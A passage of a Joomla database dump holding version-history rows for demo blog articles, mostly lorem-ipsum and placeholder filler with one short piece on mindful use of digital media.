\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"link\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"=\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"Responive Joomla Templates\\\",\\\"link_url\\\":\\\"http:\\\\\\/\\\\\\/www.joomshaper.com\\\\\\/joomla-templates\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":2,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(29,76,1,'','2015-02-02 21:00:29',692,3054,'2b7e156f98ef23e5293b94c2c792d29e5c8e355f','{\"id\":76,\"asset_id\":\"200\",\"title\":\"Who Actually Clicks on Banner Ads?\",\"alias\":\"who-actually-clicks-on-banner-ads\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 21:00:29\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 20:59:51\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"link\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"Responive Joomla Templates\\\",\\\"link_url\\\":\\\"http:\\\\\\/\\\\\\/www.joomshaper.com\\\\\\/joomla-templates\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":3,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(30,76,1,'','2015-02-02 21:03:52',692,3267,'2cc28fa75fa79e432bd08cb348d8397b4b2bad98','{\"id\":76,\"asset_id\":\"200\",\"title\":\"See the new Miss Universe get her crown\",\"alias\":\"see-the-new-miss-universe-get-her-crown\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 21:03:52\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 21:02:26\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"quote\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"Pork meatball ground round prosciutto. Sirloin bresaola ball tip shank tail porchetta pork boudin filet mignon flank jowl salami. Filet mignon bresaola pork boudin capicola prosciutto. Frankfurter chicken leberkas drumstick ball tip turducken rump spare ribs meatball.\\\",\\\"quote_author\\\":\\\"- John Doe\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":4,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(31,76,1,'','2015-02-02 21:04:39',692,3397,'8beda0d66c8c213f9a621f81613a871e1cc86e4f','{\"id\":76,\"asset_id\":\"200\",\"title\":\"See the new Miss Universe get her crown\",\"alias\":\"see-the-new-miss-universe-get-her-crown\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 21:04:39\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 21:04:08\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"quote\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"Pork meatball ground round prosciutto. Sirloin bresaola ball tip shank tail porchetta pork boudin filet mignon flank jowl salami. Filet mignon bresaola pork boudin capicola prosciutto. Frankfurter chicken leberkas drumstick ball tip turducken rump spare ribs meatball. Tail salami pork loin ham. Drumstick flank porchetta, hamburger ham swine biltong chicken pancetta. Spare ribs prosciutto t-bone.\\\",\\\"quote_author\\\":\\\"- John Doe\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":5,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(32,77,1,'','2015-02-02 21:05:10',692,3022,'4bea0e0fd22f934dff631c5d14e91c65cc80c5b5','{\"id\":77,\"asset_id\":201,\"title\":\"Who Actually Clicks on Banner Ads? (2)\",\"alias\":\"who-actually-clicks-on-banner-ads-2\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":0,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 21:05:00\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"link\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"Responive Joomla Templates\\\",\\\"link_url\\\":\\\"http:\\\\\\/\\\\\\/www.joomshaper.com\\\\\\/joomla-templates\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(33,77,1,'','2015-02-02 21:05:57',692,3378,'05e3b522a0e0b79dac1156b6a5be2c90e8edc821','{\"id\":77,\"asset_id\":\"201\",\"title\":\"See the new Miss Universe get her crown\",\"alias\":\"see-the-new-miss-universe-get-her-crown\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":0,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 21:05:57\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 21:05:24\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"quote\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"Pork meatball ground round prosciutto. Sirloin bresaola ball tip shank tail porchetta pork boudin filet mignon flank jowl salami. Filet mignon bresaola pork boudin capicola prosciutto. Frankfurter chicken leberkas drumstick ball tip turducken rump spare ribs meatball. Tail salami pork loin ham. Drumstick flank porchetta, hamburger ham swine biltong chicken pancetta. Spare ribs prosciutto t-bone.\\\",\\\"quote_author\\\":\\\"- John Doe\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":2,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(34,77,1,'','2016-02-27 09:30:29',692,3879,'c1fca98f5fe12d620fa34c47df89099070651230','{\"id\":77,\"asset_id\":\"201\",\"title\":\"Why we all need to be connected.\",\"alias\":\"why-we-all-need-to-be-connected\",\"introtext\":\"<p>We\\u2019re in a period where the cutting edge of change has moved from the technology to the literacies made possible by the technology.<\\/p>\\r\\n<p>The future of digital culture \\u2013 yours, mine, and ours \\u2013 depends on how well we learn to use the media that have infiltrated, amplified, distracted, enriched, and complicated our lives. I believe that learning to live mindfully in cyber culture is as impor\\u00adtant to us as a civilization as it is vital to you and me as individuals. The mindful use of digital media doesn\\u2019t happen automatically.<\\/p>\\r\\n<p>Thinking about what you are doing and why you are doing it instead of going through the motions is fundamental to the defi\\u00adnition of mindful, whether you are de\\u00adciding to follow someone on Twitter, shutting the lid of your laptop in class, looking up from your BlackBerry in a meeting, or consciously deciding which links not to click. Although edu\\u00adcational institutions have been slow to incorporate digital literacies, practi\\u00adcal know-how is available to those who figure out how to find it. This know-how, from the art of growing social capital in virtual communities to the craft of cultivating wiki collaboration, might determine whether life online will drive us to distraction, or augment and broaden our minds.<\\/p>\\r\\n<p>Those who un\\u00adderstand the fundamentals of digital participation, online collaboration, in\\u00adformational credibility testing, and network awareness will be able to exert more control over their own fates than those who lack this lore.<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-27 09:30:29\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-27 09:29:00\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"quote\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"Pork meatball ground round prosciutto. Sirloin bresaola ball tip shank tail porchetta pork boudin filet mignon flank jowl salami. Filet mignon bresaola pork boudin capicola prosciutto. Frankfurter chicken leberkas drumstick ball tip turducken rump spare ribs meatball. Tail salami pork loin ham. Drumstick flank porchetta, hamburger ham swine biltong chicken pancetta. Spare ribs prosciutto t-bone.\\\",\\\"quote_author\\\":\\\"- John Doe\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":3,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"28\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(35,74,1,'','2016-02-27 09:31:13',692,3630,'5f44ff7f25593518aa6236c578b12c6a4f4acb48','{\"id\":74,\"asset_id\":\"198\",\"title\":\"The salesman is dead. Long live the salesman.\",\"alias\":\"the-salesman-is-dead-long-live-the-salesman\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, 